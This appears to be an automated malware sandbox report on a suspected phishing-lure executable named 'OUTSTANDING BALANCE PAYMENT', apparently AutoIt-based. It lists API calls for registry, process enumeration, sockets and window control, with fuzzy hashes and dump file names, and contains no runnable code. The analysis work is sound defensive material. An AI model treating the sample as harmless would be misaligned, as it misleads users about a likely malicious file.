                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00BC90BC
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BC90D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                          • Instruction ID: b2b65056ec6384868d781082fee92e4be252cae45960e7f52ffd7406e9f8cdf0
                                                          • Opcode Fuzzy Hash: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                          • Instruction Fuzzy Hash: 92312435640215EFEB21CF58DC88F6837E6FB5A714F1802A8F9198F2B1CBB1A841DB41
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA08F2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA0918
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00BA091B
                                                          • SysAllocString.OLEAUT32(?), ref: 00BA0939
                                                          • SysFreeString.OLEAUT32(?), ref: 00BA0942
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0967
                                                          • SysAllocString.OLEAUT32(?), ref: 00BA0975
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 3934fc639021dae545195525bed49b9b2147254cac380395dff798481aef0f37
                                                          • Instruction ID: b1bb1961d4b641f9aff0d6717098e42e87f5ec628f20578bf47429219af32855
                                                          • Opcode Fuzzy Hash: 3934fc639021dae545195525bed49b9b2147254cac380395dff798481aef0f37
                                                          • Instruction Fuzzy Hash: 04219576605219AFAB10AF6CCC88DBB73ECEB09360F408165F919DB291DA70EC458B64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: acb7face0875eead7ba6dab511201318a0d1c85ac3b27130b14cb3ffdcd1a7f0
                                                          • Instruction ID: cdc7abc0ff97038a5cd43a92ded71dca03f954fb46b06541c7a68da247b32804
                                                          • Opcode Fuzzy Hash: acb7face0875eead7ba6dab511201318a0d1c85ac3b27130b14cb3ffdcd1a7f0
                                                          • Instruction Fuzzy Hash: BC214C3150821167D720BB3CDC53EBB73D9EF76300F5084AAFA4997151EA55D942C395
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09CB
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09F1
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00BA09F4
                                                          • SysAllocString.OLEAUT32 ref: 00BA0A15
                                                          • SysFreeString.OLEAUT32 ref: 00BA0A1E
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0A38
                                                          • SysAllocString.OLEAUT32(?), ref: 00BA0A46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: edb1638caa58cb8187a3c8d16f6ff92fc0b2408b29e0a6e2799cb44efa90fceb
                                                          • Instruction ID: 70688c270800100ad8630b8bc1713932f93344e7a90b493f760140490261b126
                                                          • Opcode Fuzzy Hash: edb1638caa58cb8187a3c8d16f6ff92fc0b2408b29e0a6e2799cb44efa90fceb
                                                          • Instruction Fuzzy Hash: 05215675614204AFDB10EFA8DCC9DAB77ECEF19360B408165F919CB2A1DA71EC418764
                                                          APIs
                                                            • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                            • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                            • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BCA32D
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BCA33A
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BCA345
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BCA354
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BCA360
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                          • Instruction ID: 82c9999b836bb39f2502ea0cc6754ce35fd0f97c9b1fc38528c00e886974fa47
                                                          • Opcode Fuzzy Hash: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                          • Instruction Fuzzy Hash: 681193B155011DBEEF155F60CC85EEB7F6DFF09798F014114BA08A60A0C6729C21DBA4
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 00B7CCF6
                                                          • GetWindowRect.USER32(?,?), ref: 00B7CD37
                                                          • ScreenToClient.USER32(?,?), ref: 00B7CD5F
                                                          • GetClientRect.USER32(?,?), ref: 00B7CE8C
                                                          • GetWindowRect.USER32(?,?), ref: 00B7CEA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                          • Instruction ID: 89218b3519f7503e80a41d1a37718a8927a63538b4a3051ada0336399255e1a1
                                                          • Opcode Fuzzy Hash: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                          • Instruction Fuzzy Hash: 8AB12B79900649DBDB10CFA8C5807EDBBF1FF08310F1495AEEC69AB254EB70AA50CB54
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00BC1C18
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00BC1C26
                                                          • __wsplitpath.LIBCMT ref: 00BC1C54
                                                            • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                          • _wcscat.LIBCMT ref: 00BC1C69
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00BC1CDF
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00BC1CF1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                          • String ID:
                                                          • API String ID: 1380811348-0
                                                          • Opcode ID: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                          • Instruction ID: 9bd5c0c28d3ae0e1458677c15b32dfd11676cd51f9d5b33046d1db5f8e4bf844
                                                          • Opcode Fuzzy Hash: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                          • Instruction Fuzzy Hash: 92515D715043409FD720EF24C885EABBBECEF88754F00496EF58AA7251EB70DA04CB92
                                                          APIs
                                                            • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC30AF
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC30EF
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BC3112
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BC313B
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BC317E
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BC318B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                          • String ID:
                                                          • API String ID: 3451389628-0
                                                          • Opcode ID: 40bbf75a1cd765570557af778e04c00ba7f3dd5774098e174eb2585692cc459e
                                                          • Instruction ID: 9af0b76db08ea17d818b6b0e8e7a69b933fd39abf0df30c2f534b93722cbd49c
                                                          • Opcode Fuzzy Hash: 40bbf75a1cd765570557af778e04c00ba7f3dd5774098e174eb2585692cc459e
                                                          • Instruction Fuzzy Hash: 6F516C31608300AFC700EF64C895E6ABBF9FF89700F04899DF595972A1DB75EA05CB52
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00BC8540
                                                          • GetMenuItemCount.USER32(00000000), ref: 00BC8577
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BC859F
                                                          • GetMenuItemID.USER32(?,?), ref: 00BC860E
                                                          • GetSubMenu.USER32(?,?), ref: 00BC861C
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BC866D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 0415878c680cc824503c516adf9e48ae0f8350953103adaffcc90448d6b7c737
                                                          • Instruction ID: 0257b963ece2c2f2364c8a3d9b01b37f8feb8592086cc0f32cdfd66238ec0396
                                                          • Opcode Fuzzy Hash: 0415878c680cc824503c516adf9e48ae0f8350953103adaffcc90448d6b7c737
                                                          • Instruction Fuzzy Hash: 0F519D31A00615AFDF11EFA8C981EAEB7F4EF58310F1044A9E915BB351DF75AE418B90
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BA4B10
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4B5B
                                                          • IsMenu.USER32(00000000), ref: 00BA4B7B
                                                          • CreatePopupMenu.USER32 ref: 00BA4BAF
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00BA4C0D
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BA4C3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                          • Instruction ID: d3436996cc140188b283f3143b8d1ecbf660ec9e6383c4ae4d261c39f625f708
                                                          • Opcode Fuzzy Hash: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                          • Instruction Fuzzy Hash: F351D370609249EFCF20CF64C988BADBBF4EF86324F144199E4299B291E7F1D944CB61
                                                          APIs
                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00BFDC00), ref: 00BB8E7C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8E89
                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00BB8EAD
                                                          • #16.WSOCK32(?,?,00000000,00000000), ref: 00BB8EC5
                                                          • _strlen.LIBCMT ref: 00BB8EF7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8F6A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_strlenselect
                                                          • String ID:
                                                          • API String ID: 2217125717-0
                                                          • Opcode ID: d572ef60a67ce9c3e880a4c68a95257981f0dce5c986b8171d583e2f709e6c37
                                                          • Instruction ID: 6b419e6eaffa3ccd060e75f06b445b2c6c6247f7ed446365e78aae90c96669e4
                                                          • Opcode Fuzzy Hash: d572ef60a67ce9c3e880a4c68a95257981f0dce5c986b8171d583e2f709e6c37
                                                          • Instruction Fuzzy Hash: EC416E71600104AFCB14EB64C9D5AFEB7EEEB58310F104699F51A97291DFB4EE44CB60
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • BeginPaint.USER32(?,?,?), ref: 00B7AC2A
                                                          • GetWindowRect.USER32(?,?), ref: 00B7AC8E
                                                          • ScreenToClient.USER32(?,?), ref: 00B7ACAB
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B7ACBC
                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00B7AD06
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BDE673
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                          • String ID:
                                                          • API String ID: 2592858361-0
                                                          • Opcode ID: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                          • Instruction ID: 25923f1cc20dca5338bdde13be057e103830c1587683b3ef9b8997df2cf66b1f
                                                          • Opcode Fuzzy Hash: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                          • Instruction Fuzzy Hash: 54419371104201AFC721DF24DC84F7E7BE8EB59320F1846A9F9A88B2A1D7719945DB62
                                                          APIs
                                                          • ShowWindow.USER32(00C21628,00000000,00C21628,00000000,00000000,00C21628,?,00BDDC5D,00000000,?,00000000,00000000,00000000,?,00BDDAD1,00000004), ref: 00BCE40B
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00BCE42F
                                                          • ShowWindow.USER32(00C21628,00000000), ref: 00BCE48F
                                                          • ShowWindow.USER32(00000000,00000004), ref: 00BCE4A1
                                                          • EnableWindow.USER32(00000000,00000001), ref: 00BCE4C5
                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BCE4E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
                                                          • Instruction ID: b6a9d1618646c62f4b31ce45580f4c901aacc6ad305fbf76dd59db533ff27d71
                                                          • Opcode Fuzzy Hash: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
                                                          • Instruction Fuzzy Hash: 49413E34601141EFDB2ACF24C499FA87BE1FF09304F5881E9EA698F2A2C771E841CB51
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BA98D1
                                                            • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                            • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BA9908
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00BA9924
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00BA999E
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BA99B3
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA99D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 2537439066-0
                                                          • Opcode ID: 675413fb446db70c8987997e91757c59344991d2915b2a89634cba596540a83d
                                                          • Instruction ID: 8a303c6592b0e924c7e3cf4733b8f5ddb0c0cfb1a3f9da777b344a7c834efc95
                                                          • Opcode Fuzzy Hash: 675413fb446db70c8987997e91757c59344991d2915b2a89634cba596540a83d
                                                          • Instruction Fuzzy Hash: 5A318F31A00105AFDB00AFA5DC85EAFB7B9FF45310B1480A9F914AB286DB74DE10DBA5
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00BB77F4,?,?,00000000,00000001), ref: 00BB9B53
                                                            • Part of subcall function 00BB6544: GetWindowRect.USER32(?,?), ref: 00BB6557
                                                          • GetDesktopWindow.USER32 ref: 00BB9B7D
                                                          • GetWindowRect.USER32(00000000), ref: 00BB9B84
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BB9BB6
                                                            • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                          • GetCursorPos.USER32(?), ref: 00BB9BE2
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BB9C44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
                                                          • Instruction ID: 5cba41ff0755ac5588dd90b0cadfade21baae686c118b2a88f4066bde58baace
                                                          • Opcode Fuzzy Hash: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
                                                          • Instruction Fuzzy Hash: 5B31C172208355AFC720DF14DC89FAAB7E9FF89314F00096AF695D7191DAB1E904CB91
                                                          APIs
